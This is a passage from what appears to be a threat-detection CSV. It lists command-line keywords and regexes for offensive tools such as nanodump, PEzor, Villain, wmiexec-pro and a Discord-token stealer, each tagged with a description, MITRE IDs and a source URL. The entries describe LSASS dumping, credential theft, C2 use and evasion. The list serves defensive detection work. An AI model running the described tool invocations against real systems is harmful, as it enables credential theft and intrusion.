used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* --fakemail *",".{0,1000}\s\-\-fakemail\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* fcrdns.nse*",".{0,1000}\sfcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* fenty.py*",".{0,1000}\sfenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "* --file ownedusers.txt*",".{0,1000}\s\-\-file\sownedusers\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* file://catspin.yaml *",".{0,1000}\sfile\:\/\/catspin\.yaml\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "* --file-smuggler-port *",".{0,1000}\s\-\-file\-smuggler\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "* filetransfer -download -src-file *.exe*/tmp*",".{0,1000}\sfiletransfer\s\-download\s\-src\-file\s.{0,1000}\.exe.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* filetransfer -upload -src-file *.exe*\temp*",".{0,1000}\sfiletransfer\s\-upload\s\-src\-file\s.{0,1000}\.exe.{0,1000}\\temp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* FileZillaPwd*",".{0,1000}\sFileZillaPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* finger.nse*",".{0,1000}\sfinger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* fingerprint-strings.nse*",".{0,1000}\sfingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* firewalk.nse*",".{0,1000}\sfirewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* firewall-bypass.nse*",".{0,1000}\sfirewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* flash.bat*",".{0,1000}\sflash\.bat.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "* -fluctuate=NA -sleep=*",".{0,1000}\s\-fluctuate\=NA\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -fluctuate=RW -sleep=*",".{0,1000}\s\-fluctuate\=RW\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* flume-master-info.nse*",".{0,1000}\sflume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --flush-attacks*",".{0,1000}\s\-\-flush\-attacks.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "* follina.py *",".{0,1000}\sfollina\.py\s.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "* -force-forwardable",".{0,1000}\s\-force\-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --force-kerb *",".{0,1000}\s\-\-force\-kerb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --force-ps32",".{0,1000}\s\-\-force\-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --ForceShadowCred*",".{0,1000}\s\-\-ForceShadowCred.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* Forensike.ps1*",".{0,1000}\sForensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "* forgeTGT(*",".{0,1000}\sforgeTGT\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* --fork --write *.dmp*",".{0,1000}\s\-\-fork\s\-\-write\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* ForkDump.cpp*",".{0,1000}\sForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "* ForkLib.cpp*",".{0,1000}\sForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "* --format exe * --jitter *",".{0,1000}\s\-\-format\sexe\s\s.{0,1000}\s\-\-jitter\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* --format kirbi*",".{0,1000}\s\-\-format\skirbi.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* -format=bof *.exe*",".{0,1000}\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=bof -cleanup *",".{0,1000}\s\-format\=bof\s\-cleanup\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=dotnet -sleep=*",".{0,1000}\s\-format\=dotnet\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=dotnet-pinvoke *",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=dotnet-pinvoke *.exe*",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* --format=krb5asrep* --wordlist=*",".{0,1000}\s\-\-format\=krb5asrep.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --format=netntlmv2 *.txt*",".{0,1000}\s\-\-format\=netntlmv2\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --format=NT -w=*_password.txt*",".{0,1000}\s\-\-format\=NT\s\-w\=.{0,1000}_password\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -format=reflective-dll *",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=reflective-dll *.exe*",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=service-dll *.exe*",".{0,1000}\s\-format\=service\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 